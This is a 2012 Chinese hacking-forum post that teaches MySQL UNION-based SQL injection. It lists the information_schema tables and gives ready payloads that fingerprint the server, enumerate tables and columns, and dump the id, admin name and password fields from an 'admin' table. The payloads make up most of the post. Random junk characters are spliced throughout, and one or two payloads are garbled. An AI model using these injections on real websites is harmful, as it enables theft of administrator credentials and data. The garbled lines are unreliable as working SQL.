找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1969|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
' N7 F5 t& @7 e7 X1 v1 L: L! L9 p+ c; q" u  e
学习盲注前先了解下 IFORMATION_SCHEMA 库0 I/ ?3 q0 N( b& p: {" u' k- _4 Z2 T

' V! c$ Z1 t+ TMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
& c: e$ K, h( \6 R存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。( _  I1 M$ W. i2 S
1.得到所有数据库名:
+ Z3 E% o  W% G. a|SCHEMATA ->存储数据库名的表3 L+ t1 I6 c) ?6 g0 O8 n! Z8 a- x
|---字段:SCHEMA_NAME ->数据库名称; I9 [7 I, L. B% a$ t8 O
( _# }! `4 N2 y
|TABLES ->存储表名
) F* p( ]; j$ a: `|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名( X" [' K9 V+ `
|---字段:TABLE_NAME ->存储表的表名
' ]* f1 P% a% ~0 l% `2 U3 Z4 ^& f) X6 u9 T9 G6 X: R
|COLUMNS ->存储的字段名表
: h- _: s6 _' M5 p; C4 O, n|---字段:TABLE_SCHEMA ->该字段所属数据库名
7 @5 q3 Z+ C5 K+ Z0 p|---字段:TABLE_NAME ->存储所属表的名称
9 l( Q' X, G5 a! ?; Q7 Q3 x9 y
4 O1 X- f) V2 x. R; e8 _+ V|---字段:COLUMN_NAME ->该字段的名称
/ g" W; Y. {5 I" G4 q* K! }1 U: g. V* G! D6 ^$ `; t

; [! z) J3 z. w9 }/ D1 U8 b  ?$ X! F
###########################################################################
2 {8 D% E  B' I4 c; b+ z, S' X/ V
. k# }, m# T" V8 X0 u5 \* J5 w0x001 获取系统信息:! @) k6 s+ E  V0 j# ~" }, t

6 a. T- E# A% `( tunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
+ ~# I, ?6 P/ @' A: l
7 q/ c( d6 ~9 i1 }$ ?/*0 C; B) c# U3 t2 ^% Q0 _$ ~. f

5 v5 y$ h& X$ W/ v( y+ q@@global.version_compile_os 获取系统版本
9 c3 ~" T! C: ~' K! [9 M6 y
, \7 E0 Q' K1 z- \5 G  c) m: Z& ^@@datadir 数据库路径
/ c, x3 z/ O( K) b- T' T2 Fdatabase() 当前数据库名称& U! F  W  S! G! T. Y2 d
0x3c62723e 换行HEX值& R- d! \/ W. D6 O7 ?0 n7 H
. h3 e7 i! t0 z4 f; g1 P& f
*/) i8 Q0 N% ?# h; ]
0 L  T& j9 K6 y4 ]: o' @5 A
" [* w9 T! X. S+ E' |2 k
+ X/ P' q! @5 M3 P  z% f5 O8 z
######################################################################) g: ^/ H* \, Q3 d% ]2 Q( b* T

8 |4 c" B2 g& Q! ?" Q0x002 获取表名
4 V5 v' H$ x7 M* v4 P
+ I* K$ }8 n: W/ s# i% `, L9 vunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*6 g* ?2 ^9 E! F3 Z& m
$ M9 `, I" U, V( w
" |+ s" G( _) x

0 u, c# J6 ~% P" U% _/ ]; Z8 m/*' g- \% p% U8 [5 D$ S

7 e5 X% }: C) V/ g. p" B$ k+ @0x67617264656e 为当前数据库名5 Z: [$ x" _1 A2 \0 [1 q" G( m+ ?

' D2 D7 k4 k  t0 Z* w; egroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
* M9 {9 x8 U( q0 _. o- `( {+ s9 l
1 C! D/ ]. \; u9 o) ^*/
* r( d8 M% l+ O$ ]- r3 z) y3 p' w) B" @3 H& Y$ w
######################################################################
" E( h9 R, n) Q3 B  z& M+ f
3 r6 q  b" V5 _. E9 P
/ [6 v+ M0 V& J# c  f2 Q8 i
3 b/ T( b! m* `! g9 k+ D0x003 获取字段
7 g7 B3 k; i# _2 [7 Z9 J% I' H% L$ u, q( `- U% F9 W
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
. X' y4 N5 a0 C' K+ d: e$ n: M: N5 Y6 I' `
/*
6 x0 z2 t9 ~- Y3 ^( j$ U! n. \+ g2 w5 G; G7 P
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
, T8 c# J' V$ ~4 a2 N4 d* F, x) Z1 e; v# ?" r
0x61646d696e ->选择一个表
1 c1 X. u: f0 G# r( }+ w
2 @" a( n+ k2 _* [; b0x67617264656e ->数据库名
8 B! `2 J! J0 a: z; e: a0 f
. q, s0 v2 h- t5 v5 ~* F*/% @1 K4 g3 g& t7 g7 O9 O

. s1 o+ j( c# ]#####################################################################
1 I! N5 v3 X( b7 L
& s0 k; w+ }: U0 [, c2 }4 E
, e& m5 _; r  n
, e( S# J2 T* A& E% Y0x004 获取数据
2 J6 n+ ]) |* {, j5 e% d3 R$ `) c% K- ]: ^2 j4 K
union select 1,2,3, E& E" q+ q+ ^; m/ _! L, x
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
! t  L9 g, r1 p" C5 W# P9 X- P- x" i
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin2 r% ?7 q1 |6 m/ V1 }
( z4 N  Y4 X$ u. W" I8 {

! o! j3 B9 J+ w+ G9 H) A$ _% U  V& ?* @( X* z& z
/*
; Q. `& }2 C- R3 }  t- E6 m  h8 L3 ?
0x3c62723e 换行符号HEX编码1 M! M! e$ ^* A+ e

/ ~; ^# l* P# B2 n% D, rgroup_concat 同时获得该字段所有数据, `) [( w" h  E# I+ o5 \

/ [5 E$ y" {, x. _*/
0 M9 N! K8 C7 E1 Z& H7 J
1 c7 H% }" ~5 F/ E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表